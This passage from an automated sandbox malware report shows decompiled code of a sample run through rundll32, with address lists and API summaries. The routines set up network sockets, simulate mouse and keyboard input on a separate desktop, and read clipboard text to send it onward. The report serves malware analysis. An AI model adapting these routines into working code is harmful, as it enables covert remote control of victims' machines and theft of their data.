                                                            				signed int* _t195;
                                                            				signed int _t206;
                                                            				signed int _t209;
                                                            				signed int* _t210;
                                                            				signed int _t211;
                                                            				intOrPtr _t213;
                                                            				void* _t214;
                                                            				long _t222;
                                                            				signed int _t223;
                                                            				signed int _t225;
                                                            				intOrPtr* _t228;
                                                            				signed int _t229;
                                                            				signed int _t243;
                                                            				intOrPtr _t250;
                                                            				signed int _t252;
                                                            				signed int _t257;
                                                            				signed int _t261;
                                                            				signed short* _t265;
                                                            				intOrPtr* _t266;
                                                            				signed int _t268;
                                                            				signed int _t269;
                                                            				long _t270;
                                                            				intOrPtr _t277;
                                                            				signed short* _t278;
                                                            				signed int _t279;
                                                            				struct _CRITICAL_SECTION* _t281;
                                                            				intOrPtr _t283;
                                                            				intOrPtr _t285;
                                                            				signed int _t291;
                                                            				signed int _t292;
                                                            				signed int _t293;
                                                            				signed int _t294;
                                                            				void* _t295;
                                                            				signed int _t296;
                                                            				signed int _t297;
                                                            
                                                            				_t124 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t124 ^ _t291;
                                                            				_push(__ebx);
                                                            				_t209 = _a12;
                                                            				_push(__esi);
                                                            				_t277 = __ecx;
                                                            				_v56 = _a4;
                                                            				_v60 = _a20;
                                                            				_push(__edi);
                                                            				_t265 = _a24;
                                                            				_v64 = __ecx;
                                                            				_t127 = E0464D020(_a4, __ecx);
                                                            				_t250 = _a8;
                                                            				_t222 = _v56;
                                                            				 *_t265 = _t127;
                                                            				_push(_t265);
                                                            				if(_t127 == 0) {
                                                            					_t128 = E0464D160(_t209, _t222, _t250, _t265, __ecx, __eflags);
                                                            				} else {
                                                            					_t128 = E0464D0D0(_t209, _t250, _t265, __ecx);
                                                            				}
                                                            				_t296 = _t295 + 4;
                                                            				if(_t128 != 0) {
                                                            					_t278 = _t277 + 0x5c;
                                                            					__eflags = _t209;
                                                            					if(_t209 == 0) {
                                                            						L9:
                                                            						_t129 =  *_t278 & 0x0000ffff;
                                                            						__eflags = _t129 - 2;
                                                            						if(_t129 == 2) {
                                                            							L14:
                                                            							_v56 = 1;
                                                            							__eflags = _t129 -  *_t265;
                                                            							if(_t129 ==  *_t265) {
                                                            								goto L12;
                                                            							} else {
                                                            								goto L35;
                                                            							}
                                                            						} else {
                                                            							__eflags = _t129 - 0x17;
                                                            							if(_t129 == 0x17) {
                                                            								goto L14;
                                                            							} else {
                                                            								_v56 = 0;
                                                            								L12:
                                                            								_t130 =  *_t265 & 0x0000ffff;
                                                            								_t210 = 0;
                                                            								__imp__#23(_t130, 1, 6);
                                                            								_t223 = _t130;
                                                            								_t131 = _v60;
                                                            								 *_t131 = _t223;
                                                            								__eflags = _t223 - 0xffffffff;
                                                            								if(_t223 != 0xffffffff) {
                                                            									_t132 = _v64;
                                                            									__eflags =  *(_t132 + 0x30);
                                                            									if( *(_t132 + 0x30) == 0) {
                                                            										L19:
                                                            										_t252 = 0;
                                                            										__eflags = 0;
                                                            									} else {
                                                            										__eflags =  *(_t132 + 0x34);
                                                            										if( *(_t132 + 0x34) <= 0) {
                                                            											goto L19;
                                                            										} else {
                                                            											_t252 = 1;
                                                            										}
                                                            									}
                                                            									_v20 = _t252;
                                                            									_v12 =  *(_t132 + 0x34);
                                                            									_t135 =  &_v20;
                                                            									_v16 =  *(_t132 + 0x30);
                                                            									__imp__WSAIoctl(_t223, 0x98000004, _t135, 0xc, 0, 0,  &_v24, 0, 0);
                                                            									__eflags = _t135 - 0xffffffff;
                                                            									if(_t135 != 0xffffffff) {
                                                            										L23:
                                                            										_t223 =  *_v60;
                                                            										_t137 = E0464D490(_t210, _t223,  *((intOrPtr*)(_v64 + 4)), _t265, _t278);
                                                            										__eflags = _t137 - 0xffffffff;
                                                            										if(_t137 == 0xffffffff) {
                                                            											goto L37;
                                                            										} else {
                                                            											_t243 = _a16;
                                                            											__eflags = _t243;
                                                            											if(_t243 != 0) {
                                                            												__eflags = _v56 - _t210;
                                                            												if(_v56 == _t210) {
                                                            													__eflags =  *_t265 - 2;
                                                            													_t278 =  !=  ? 0x46866e4 : 0x46866c8;
                                                            												}
                                                            												asm("movups xmm0, [esi]");
                                                            												_t30 =  &(_t278[0xc]); // 0x0
                                                            												_t191 =  *_t30;
                                                            												asm("movups [ebp-0x30], xmm0");
                                                            												_v28 = _t191;
                                                            												asm("movq xmm0, [esi+0x10]");
                                                            												asm("movq [ebp-0x20], xmm0");
                                                            												__imp__#9(_t243);
                                                            												__eflags = _v52 - 2;
                                                            												_v50 = _t191;
                                                            												_t193 =  ==  ? 0x10 : 0x1c;
                                                            												__eflags = 0x1c;
                                                            												_push( ==  ? 0x10 : 0x1c);
                                                            												_push( &_v52);
                                                            											} else {
                                                            												__eflags = _v56 - _t210;
                                                            												if(_v56 == _t210) {
                                                            													__eflags =  *_t265 - 2;
                                                            													_t278 =  !=  ? 0x46866e4 : 0x46866c8;
                                                            												}
                                                            												__eflags =  *_t278 - 2;
                                                            												_t200 =  !=  ? 0x1c : 0x10;
                                                            												_push( !=  ? 0x1c : 0x10);
                                                            												_push(_t278);
                                                            											}
                                                            											_t195 = _v60;
                                                            											__imp__#2( *_t195);
                                                            											__eflags = _t195 - 0xffffffff;
                                                            											if(_t195 == 0xffffffff) {
                                                            												_t131 =  *__imp__#111();
                                                            												goto L33;
                                                            											}
                                                            											goto L34;
                                                            										}
                                                            									} else {
                                                            										__imp__#111();
                                                            										__eflags = _t135 - 0x2733;
                                                            										if(_t135 == 0x2733) {
                                                            											goto L23;
                                                            										} else {
                                                            											__eflags = _t135 - 0xffffffff;
                                                            											if(_t135 == 0xffffffff) {
                                                            												_push(0x80004005);
                                                            												E04637AC0();
                                                            												L37:
                                                            												_push(0x80004005);
                                                            												E04637AC0();
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												asm("int3");
                                                            												_push(_t291);
                                                            												_t292 = _t296;
                                                            												_push(_t210);
                                                            												_push(_t278);
                                                            												_t211 = _t223;
                                                            												_push(_t265);
                                                            												_t266 = _v116;
                                                            												_t279 = _t211 + 0x178;
                                                            												_t139 = L04655300(_t279, _t223, _t266);
                                                            												__eflags = _t139;
                                                            												if(_t139 != 0) {
                                                            													SetLastError(0);
                                                            													_t225 = _t211;
                                                            													_t141 =  *((intOrPtr*)( *_t211 + 0xd8))( *_t266, _a4);
                                                            													__eflags = _t141 - 2;
                                                            													if(_t141 != 2) {
                                                            														__eflags = 0;
                                                            														return 0;
                                                            													} else {
                                                            														_t213 =  *_t266;
                                                            														_t268 =  *(_t279 + 4);
                                                            														__eflags = _t268;
                                                            														if(_t268 == 0) {
                                                            															L47:
                                                            															_push(0x80004005);
                                                            															E04637AC0();
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															asm("int3");
                                                            															_push(_t292);
                                                            															_t293 = _t296;
                                                            															_t297 = _t296 - 0x18;
                                                            															_t144 =  *0x4684008; // 0xd355be4e
                                                            															_v148 = _t144 ^ _t293;
                                                            															_push(_t213);
                                                            															_push(_t279);
                                                            															_v152 = _v136;
                                                            															_push(_t268);
                                                            															_t269 = _t225;
                                                            															_v156 = _v128;
                                                            															_v168 = _v124;
                                                            															_v164 = _t269;
                                                            															_v160 = 0;
                                                            															__eflags = E0464C880(_t269 + 0xb0,  &_v160);
                                                            															if(__eflags != 0) {
                                                            																_t214 = _v28;
                                                            															} else {
                                                            																_t285 =  *((intOrPtr*)(_t269 + 0xa4));
                                                            																_t214 = RtlAllocateHeap( *(_t269 + 0x94), 0, _t285 + 0x38);
                                                            																_v28 = _t214;
                                                            																_t68 = _t214 + 0x38; // 0x38
                                                            																 *(_t214 + 0x14) = _t269 + 0x94;
                                                            																 *((intOrPtr*)(_t214 + 0x24)) = _t285;
                                                            																 *((intOrPtr*)(_t214 + 0x20)) = _t68;
                                                            															}
                                                            															_push(_v24);
                                                            															asm("xorps xmm0, xmm0");
                                                            															_push(_v20);
                                                            															asm("movups [ebx], xmm0");
                                                            															 *(_t214 + 0x10) = 0;
                                                            															 *(_t214 + 0x1c) = 0;
                                                            															 *(_t214 + 0x1c) =  *(_t269 + 0x18);
                                                            															_t270 = E046527F0(_t269, __eflags);
                                                            															_t79 = _t270 + 0x54; // 0x54
                                                            															_t281 = _t79;
                                                            															EnterCriticalSection(_t281);
                                                            															_push(_a12);
                                                            															_t228 = _v32;
                                                            															E04652A10(_t228, _t281, _v20, _t270, _v36, _t269);
                                                            															_t154 = _v32;
                                                            															__eflags =  *(_t154 + 0x4c);
                                                            															if( *(_t154 + 0x4c) == 0) {
                                                            																_t228 = _v36;
                                                            																__eflags =  *_t228 - 2;
                                                            																_t156 =  !=  ? 0x1c : 0x10;
                                                            																__imp__#4( *(_t270 + 0x88), _t228, 0x10);
                                                            																__eflags = 0x10 - 0xffffffff;
                                                            																if(0x10 == 0xffffffff) {
                                                            																	__imp__#111();
                                                            																	goto L63;
                                                            																} else {
                                                            																	_t163 =  &_v20;
                                                            																	_v20 = 1;
                                                            																	__imp__#10( *(_t270 + 0x88), 0x8004667e, _t163);
                                                            																	__eflags = _t163;
                                                            																	if(_t163 != 0) {
                                                            																		goto L70;
                                                            																	} else {
                                                            																		_t174 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t163);
                                                            																		__eflags = _t174;
                                                            																		if(_t174 == 0) {
                                                            																			goto L55;
                                                            																		} else {
                                                            																			 *(_t270 + 0x48) = 1;
                                                            																			_t175 = E046520F0(_v32, _t270);
                                                            																			__eflags = _t175 - 2;
                                                            																			if(_t175 == 2) {
                                                            																				_t176 = GetLastError();
                                                            																				__eflags = _t176;
                                                            																				_t156 =  ==  ? 0x4c7 : _t176;
                                                            																				goto L63;
                                                            																			} else {
                                                            																				_t156 = E04653AC0(_t214, _v32, _t270, _t281, _t270, _t214);
                                                            																				_t229 = 0;
                                                            																			}
                                                            																		}
                                                            																		goto L64;
                                                            																	}
                                                            																}
                                                            															} else {
                                                            																_t177 =  &_v24;
                                                            																_v24 = 1;
                                                            																__imp__#10( *(_t270 + 0x88), 0x8004667e, _t177);
                                                            																__eflags = _t177;
                                                            																if(_t177 != 0) {
                                                            																	_push(0x80004005);
                                                            																	E04637AC0();
                                                            																	L70:
                                                            																	E04637AC0();
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	asm("int3");
                                                            																	_t294 = _t297;
                                                            																	_t165 =  *0x4684008; // 0xd355be4e
                                                            																	_v208 = _t165 ^ _t294;
                                                            																	_t257 = _v184;
                                                            																	__eflags = _t257;
                                                            																	_t283 = _v192;
                                                            																	_v216 = _v188;
                                                            																	_t169 =  ==  ? _t283 : _t283 + _t257;
                                                            																	_v212 =  ==  ? _t283 : _t283 + _t257;
                                                            																	 *((intOrPtr*)( *_t228 + 8))( &_v216, 1, _t281, _t293, 0x80004005);
                                                            																	__eflags = _v208 ^ _t294;
                                                            																	return E04655AFE(_v208 ^ _t294, _v196);
                                                            																} else {
                                                            																	_t180 = CreateIoCompletionPort( *(_t270 + 0x88),  *(_v32 + 0x50), _t270, _t177);
                                                            																	__eflags = _t180;
                                                            																	if(_t180 == 0) {
                                                            																		L55:
                                                            																		_t156 = GetLastError();
                                                            																	} else {
                                                            																		_t156 = E0464D560( *((intOrPtr*)(_v32 + 0x40)),  *(_t270 + 0x88), _v36, _t214);
                                                            																	}
                                                            																	L63:
                                                            																	_t229 = 1;
                                                            																	L64:
                                                            																	_v28 = _t156;
                                                            																	__eflags = _t156;
                                                            																	if(_t156 != 0) {
                                                            																		__eflags = _t229;
                                                            																		if(_t229 != 0) {
                                                            																			E04652920(_v32, _t270, 0, 0, 0);
                                                            																			_t160 = E0464C930(_v32 + 0xb0, _t214);
                                                            																			__eflags = _t160;
                                                            																			if(_t160 == 0) {
                                                            																				HeapFree( *( *(_t214 + 0x14)), _t160, _t214);
                                                            																			}
                                                            																		}
                                                            																	}
                                                            																	LeaveCriticalSection(_t281);
                                                            																	__eflags = _v16 ^ _t293;
                                                            																	return E04655AFE(_v16 ^ _t293);
                                                            																}
                                                            															}
                                                            														} else {
                                                            															_t185 = _t213 - 1;
                                                            															_t261 = _t185 %  *_t279;
                                                            															_t225 =  *( *((intOrPtr*)(_t279 + 0x44)) + _t261) & 0x000000ff;
                                                            															__eflags = _t185 /  *_t279 - _t225;
                                                            															if(_t185 /  *_t279 != _t225) {
                                                            																goto L47;
                                                            															} else {
                                                            																__eflags =  *((intOrPtr*)(_t268 + _t261 * 4)) - 1;
                                                            																if( *((intOrPtr*)(_t268 + _t261 * 4)) != 1) {
                                                            																	goto L47;
                                                            																} else {
                                                            																	_t296 = _t296 - 8;
                                                            																	_t225 = _t279;
                                                            																	_t187 = E046551B0(_t213, _t225, _t268, _t279, _t213, 0);
                                                            																	__eflags = _t187;
                                                            																	if(_t187 == 0) {
                                                            																		goto L47;
                                                            																	} else {
                                                            																		_t188 = GetLastError();
                                                            																		__eflags = _t188;
                                                            																		_t189 =  ==  ? 0x4c7 : _t188;
                                                            																		return  ==  ? 0x4c7 : _t188;
                                                            																	}
                                                            																}
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													return 0x4d6;
                                                            												}
                                                            											} else {
                                                            												goto L23;
                                                            											}
                                                            										}
                                                            									}
                                                            								} else {
                                                            									__imp__#111();
                                                            									L33:
                                                            									_t210 = _t131;
                                                            									L34:
                                                            									goto L35;
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						__eflags =  *_t209;
                                                            						if( *_t209 == 0) {
                                                            							goto L9;
                                                            						} else {
                                                            							L04671B10();
                                                            							_t278 = _t296;
                                                            							 *_t278 = E0464D020(_t209, _t278);
                                                            							_t206 = E0464D0D0(_t209, 0, _t265, _t278, _t278);
                                                            							_t296 = _t296 + 4;
                                                            							__eflags = _t206;
                                                            							if(_t206 != 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								__imp__#111();
                                                            								goto L35;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					L35:
                                                            					return E04655AFE(_v8 ^ _t291);
                                                            				}
                                                            			}































































































                                                            0x04653da6
                                                            0x04653dad
                                                            0x04653db3
                                                            0x04653db4
                                                            0x04653db7
                                                            0x04653db8
                                                            0x04653dba
                                                            0x04653dc0
                                                            0x04653dc5
                                                            0x04653dc6
                                                            0x04653dc9
                                                            0x04653dcc
                                                            0x04653dd1
                                                            0x04653dd4
                                                            0x04653dd7
                                                            0x04653dda
                                                            0x04653dde
                                                            0x04653de7
                                                            0x04653de0
                                                            0x04653de0
                                                            0x04653de0
                                                            0x04653dec
                                                            0x04653df1
                                                            0x04653dfd
                                                            0x04653e00
                                                            0x04653e02
                                                            0x04653e3c
                                                            0x04653e3c
                                                            0x04653e3f
                                                            0x04653e42
                                                            0x04653e77
                                                            0x04653e77
                                                            0x04653e7e
                                                            0x04653e81
                                                            0x00000000
                                                            0x04653e83
                                                            0x00000000
                                                            0x04653e83
                                                            0x04653e44
                                                            0x04653e44
                                                            0x04653e47
                                                            0x00000000
                                                            0x04653e49
                                                            0x04653e49
                                                            0x04653e50
                                                            0x04653e50
                                                            0x04653e53
                                                            0x04653e5a
                                                            0x04653e60
                                                            0x04653e62
                                                            0x04653e65
                                                            0x04653e67
                                                            0x04653e6a
                                                            0x04653e8d
                                                            0x04653e93
                                                            0x04653e95
                                                            0x04653ea3
                                                            0x04653ea3
                                                            0x04653ea3
                                                            0x04653e97
                                                            0x04653e97
                                                            0x04653e9a
                                                            0x00000000
                                                            0x04653e9c
                                                            0x04653e9c
                                                            0x04653e9c
                                                            0x04653e9a
                                                            0x04653ea9
                                                            0x04653eb2
                                                            0x04653ebf
                                                            0x04653ec2
                                                            0x04653ecc
                                                            0x04653ed2
                                                            0x04653ed5
                                                            0x04653eed
                                                            0x04653ef3
                                                            0x04653ef8
                                                            0x04653efd
                                                            0x04653f00
                                                            0x00000000
                                                            0x04653f06
                                                            0x04653f06
                                                            0x04653f09
                                                            0x04653f0c
                                                            0x04653f39
                                                            0x04653f3c
                                                            0x04653f3e
                                                            0x04653f4c
                                                            0x04653f4c
                                                            0x04653f4f
                                                            0x04653f52
                                                            0x04653f52
                                                            0x04653f56
                                                            0x04653f5a
                                                            0x04653f5d
                                                            0x04653f62
                                                            0x04653f67
                                                            0x04653f6d
                                                            0x04653f77
                                                            0x04653f80
                                                            0x04653f80
                                                            0x04653f83
                                                            0x04653f87
                                                            0x04653f0e
                                                            0x04653f0e
                                                            0x04653f11
                                                            0x04653f13
                                                            0x04653f21
                                                            0x04653f21
                                                            0x04653f24
                                                            0x04653f32
                                                            0x04653f35
                                                            0x04653f36
                                                            0x04653f36
                                                            0x04653f88
                                                            0x04653f8d
                                                            0x04653f93
                                                            0x04653f96
                                                            0x04653f9d
                                                            0x00000000
                                                            0x04653f9d
                                                            0x00000000
                                                            0x04653f96
                                                            0x04653ed7
                                                            0x04653ed7
                                                            0x04653edd
                                                            0x04653ee2
                                                            0x00000000
                                                            0x04653ee4
                                                            0x04653ee4
                                                            0x04653ee7
                                                            0x04653fb9
                                                            0x04653fbe
                                                            0x04653fc3
                                                            0x04653fc3
                                                            0x04653fc8
                                                            0x04653fcd
                                                            0x04653fce
                                                            0x04653fcf
                                                            0x04653fd0
                                                            0x04653fd1
                                                            0x04653fd2
                                                            0x04653fd3
                                                            0x04653fd4
                                                            0x04653fd5
                                                            0x04653fd6
                                                            0x04653fd7
                                                            0x04653fd8
                                                            0x04653fd9
                                                            0x04653fda
                                                            0x04653fdb
                                                            0x04653fdc
                                                            0x04653fdd
                                                            0x04653fde
                                                            0x04653fdf
                                                            0x04653fe0
                                                            0x04653fe1
                                                            0x04653fe3
                                                            0x04653fe4
                                                            0x04653fe5
                                                            0x04653fe7
                                                            0x04653fe8
                                                            0x04653fec
                                                            0x04653ff5
                                                            0x04653ffa
                                                            0x04653ffc
                                                            0x0465400c
                                                            0x04654017
                                                            0x0465401b
                                                            0x04654021
                                                            0x04654024
                                                            0x04654071
                                                            0x04654075
                                                            0x04654026
                                                            0x04654026
                                                            0x04654028
                                                            0x0465402b
                                                            0x0465402d
                                                            0x04654078
                                                            0x04654078
                                                            0x0465407d
                                                            0x04654082
                                                            0x04654083
                                                            0x04654084
                                                            0x04654085
                                                            0x04654086
                                                            0x04654087
                                                            0x04654088
                                                            0x04654089
                                                            0x0465408a
                                                            0x0465408b
                                                            0x0465408c
                                                            0x0465408d
                                                            0x0465408e
                                                            0x0465408f
                                                            0x04654090
                                                            0x04654091
                                                            0x04654093
                                                            0x04654096
                                                            0x0465409d
                                                            0x046540a3
                                                            0x046540a4
                                                            0x046540a5
                                                            0x046540ab
                                                            0x046540ac
                                                            0x046540ae
                                                            0x046540b4
                                                            0x046540c1
                                                            0x046540c4
                                                            0x046540d0
                                                            0x046540d2
                                                            0x04654105
                                                            0x046540d4
                                                            0x046540d4
                                                            0x046540ec
                                                            0x046540f4
                                                            0x046540f7
                                                            0x046540fa
                                                            0x046540fd
                                                            0x04654100
                                                            0x04654100
                                                            0x04654108
                                                            0x0465410b
                                                            0x04654110
                                                            0x04654113
                                                            0x04654116
                                                            0x0465411d
                                                            0x04654127
                                                            0x0465412f
                                                            0x04654131
                                                            0x04654131
                                                            0x04654135
                                                            0x0465413b
                                                            0x04654142
                                                            0x04654149
                                                            0x0465414e
                                                            0x04654151
                                                            0x04654155
                                                            0x046541bb
                                                            0x046541c8
                                                            0x046541cc
                                                            0x046541d7
                                                            0x046541dd
                                                            0x046541e0
                                                            0x04654253
                                                            0x00000000
                                                            0x046541e2
                                                            0x046541e2
                                                            0x046541e5
                                                            0x046541f8
                                                            0x046541fe
                                                            0x04654200
                                                            0x00000000
                                                            0x04654206
                                                            0x04654214
                                                            0x0465421a
                                                            0x0465421c
                                                            0x00000000
                                                            0x0465421e
                                                            0x04654222
                                                            0x04654229
                                                            0x0465422e
                                                            0x04654231
                                                            0x04654241
                                                            0x04654247
                                                            0x0465424e
                                                            0x00000000
                                                            0x04654233
                                                            0x04654238
                                                            0x0465423d
                                                            0x0465423d
                                                            0x04654231
                                                            0x00000000
                                                            0x0465421c
                                                            0x04654200
                                                            0x04654157
                                                            0x04654157
                                                            0x0465415a
                                                            0x0465416d
                                                            0x04654173
                                                            0x04654175
                                                            0x046542b4
                                                            0x046542b9
                                                            0x046542be
                                                            0x046542c3
                                                            0x046542c8
                                                            0x046542c9
                                                            0x046542ca
                                                            0x046542cb
                                                            0x046542cc
                                                            0x046542cd
                                                            0x046542ce
                                                            0x046542cf
                                                            0x046542d1
                                                            0x046542d6
                                                            0x046542dd
                                                            0x046542e0
                                                            0x046542e3
                                                            0x046542e9
                                                            0x046542ec
                                                            0x046542f4
                                                            0x046542fa
                                                            0x04654303
                                                            0x04654309
                                                            0x04654314
                                                            0x0465417b
                                                            0x04654189
                                                            0x0465418f
                                                            0x04654191
                                                            0x046541b0
                                                            0x046541b0
                                                            0x04654193
                                                            0x046541a3
                                                            0x046541a8
                                                            0x04654259
                                                            0x04654259
                                                            0x0465425e
                                                            0x0465425e
                                                            0x04654261
                                                            0x04654263
                                                            0x04654265
                                                            0x04654267
                                                            0x04654275
                                                            0x04654281
                                                            0x04654286
                                                            0x04654288
                                                            0x04654291
                                                            0x04654291
                                                            0x04654288
                                                            0x04654267
                                                            0x04654298
                                                            0x046542a4
                                                            0x046542b1
                                                            0x046542b1
                                                            0x04654175
                                                            0x0465402f
                                                            0x04654034
                                                            0x04654037
                                                            0x04654039
                                                            0x0465403d
                                                            0x0465403f
                                                            0x00000000
                                                            0x04654041
                                                            0x04654041
                                                            0x04654045
                                                            0x00000000
                                                            0x04654047
                                                            0x04654047
                                                            0x0465404a
                                                            0x0465404f
                                                            0x04654054
                                                            0x04654056
                                                            0x00000000
                                                            0x04654058
                                                            0x04654058
                                                            0x0465405f
                                                            0x04654067
                                                            0x0465406c
                                                            0x0465406c
                                                            0x04654056
                                                            0x04654045
                                                            0x0465403f
                                                            0x0465402d
                                                            0x04653ffe
                                                            0x04654007
                                                            0x04654007
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04653ee7
                                                            0x04653ee2
                                                            0x04653e6c
                                                            0x04653e6c
                                                            0x04653f9f
                                                            0x04653f9f
                                                            0x04653fa1
                                                            0x00000000
                                                            0x04653fa1
                                                            0x04653e6a
                                                            0x04653e47
                                                            0x04653e04
                                                            0x04653e04
                                                            0x04653e08
                                                            0x00000000
                                                            0x04653e0a
                                                            0x04653e0f
                                                            0x04653e16
                                                            0x04653e20
                                                            0x04653e25
                                                            0x04653e2a
                                                            0x04653e2d
                                                            0x04653e2f
                                                            0x00000000
                                                            0x04653e31
                                                            0x04653e31
                                                            0x00000000
                                                            0x04653e31
                                                            0x04653e2f
                                                            0x04653e08
                                                            0x04653df3
                                                            0x04653fa3
                                                            0x04653fb6
                                                            0x04653fb6

                                                            APIs
                                                              • Part of subcall function 0464D020: StrChrW.SHLWAPI(?,0000003A), ref: 0464D044
                                                              • Part of subcall function 0464D0D0: WSASetLastError.WS2_32(00002741), ref: 0464D0FA
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,04653D36,?,?,?,?,FFFFFFFF,?), ref: 04653E31
                                                            • socket.WS2_32(00000000,00000001,00000006), ref: 04653E5A
                                                            • WSAGetLastError.WS2_32 ref: 04653E6C
                                                              • Part of subcall function 0464D0D0: WSAStringToAddressW.WS2_32(?,?,00000000,?,?), ref: 0464D12F
                                                              • Part of subcall function 0464D0D0: htons.WS2_32 ref: 0464D13F
                                                            • WSAIoctl.WS2_32(00000000,98000004,?,0000000C,00000000,00000000,FFFFFFFF,00000000,00000000), ref: 04653ECC
                                                            • WSAGetLastError.WS2_32 ref: 04653ED7
                                                            • bind.WS2_32(?,00000002,0000001C), ref: 04653F8D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$AddressIoctlStringbindhtonssocket
                                                            • String ID:
                                                            • API String ID: 1590887309-0
                                                            • Opcode ID: bec11ef100987918adfd154f4332dbbcb08283f478b7b6a7a1906fa369c899ef
                                                            • Instruction ID: 302bb47639eb0786774ceb2d75287178820c640468677a7ec4c2082fc679adde
                                                            • Opcode Fuzzy Hash: bec11ef100987918adfd154f4332dbbcb08283f478b7b6a7a1906fa369c899ef
                                                            • Instruction Fuzzy Hash: 2F618171E002059BEB14DFA8E884BAEB7B5EF58750F10422AFD15E73A0F774AD818B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04645570: GetCurrentThreadId.KERNEL32 ref: 04645588
                                                              • Part of subcall function 04645570: GetThreadDesktop.USER32(00000000), ref: 0464558F
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 046455CF
                                                              • Part of subcall function 04645570: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 046455DA
                                                              • Part of subcall function 04645570: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 0464560E
                                                              • Part of subcall function 04645570: lstrcmpi.KERNEL32(?,?), ref: 0464561E
                                                              • Part of subcall function 04645570: SetThreadDesktop.USER32(00000000), ref: 04645629
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(?), ref: 0464563D
                                                              • Part of subcall function 04645570: CloseDesktop.USER32(00000000), ref: 04645640
                                                            • SetCursorPos.USER32(?,7497ADB0), ref: 04642127
                                                            • WindowFromPoint.USER32(?,7497ADB0,?,?,?,?,?,04641DC9,?,?), ref: 0464212F
                                                            • SetCapture.USER32(00000000,?,?,?,?,?,04641DC9,?,?), ref: 04642136
                                                            • keybd_event.USER32(00000000,00000000), ref: 0464217B
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0464222C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Desktop$Thread$CloseInformationObjectUser$CaptureCurrentCursorFromInputOpenPointWindowkeybd_eventlstrcmpimouse_event
                                                            • String ID:
                                                            • API String ID: 3538182014-0
                                                            • Opcode ID: ac99602a4c52cb25501af5126858e60a430c4432832817a7fcca9d0d136a0030
                                                            • Instruction ID: 52af94ce00842c09cfdbb5010166c47654a025b205f99469ba0c2e67b9d604a2
                                                            • Opcode Fuzzy Hash: ac99602a4c52cb25501af5126858e60a430c4432832817a7fcca9d0d136a0030
                                                            • Instruction Fuzzy Hash: F351D0317D0300BAFB358A64AC5BF667A59DB85F94F314142FB01BF2C5F6E478409A68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 48%
                                                            			E04637510(intOrPtr __ecx) {
                                                            				void* _v8;
                                                            				intOrPtr _v12;
                                                            				void* __esi;
                                                            				int _t9;
                                                            				void* _t12;
                                                            				void* _t20;
                                                            				void* _t24;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            				char* _t31;
                                                            
                                                            				_t22 = __ecx;
                                                            				_v12 = __ecx;
                                                            				_t9 = OpenClipboard(0);
                                                            				if(_t9 == 0) {
                                                            					return _t9;
                                                            				}
                                                            				if(IsClipboardFormatAvailable(0xd) != 0) {
                                                            					_t12 = GetClipboardData(0xd);
                                                            					_t20 = _t12;
                                                            					if(_t20 != 0) {
                                                            						GlobalFix(_t20);
                                                            						_v8 = _t12;
                                                            						_t39 = _t12;
                                                            						if(_t12 != 0) {
                                                            							_push(_t30);
                                                            							_t3 = GlobalSize(_t20) + 1; // 0x1
                                                            							_t28 = _t3;
                                                            							_push(_t28);
                                                            							_t31 = L04655B55(_t22, _t30, _t39);
                                                            							_t4 = _t28 - 1; // 0x0
                                                            							_t6 = _t31 + 1; // 0x1
                                                            							_t24 = _t6;
                                                            							 *_t31 = 0x79;
                                                            							E0465E060(_t24, _v8, _t4);
                                                            							GlobalUnWire(_t20);
                                                            							_push(_t24);
                                                            							_push(0x3f);
                                                            							_push(_t28);
                                                            							_push(_t31);
                                                            							E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            							L04655B0F(_t31);
                                                            						}
                                                            					}
                                                            				}
                                                            				return CloseClipboard();
                                                            			}













                                                            0x04637510
                                                            0x04637518
                                                            0x0463751b
                                                            0x04637523
                                                            0x046375a4
                                                            0x046375a4
                                                            0x0463752f
                                                            0x04637534
                                                            0x0463753a
                                                            0x0463753e
                                                            0x04637541
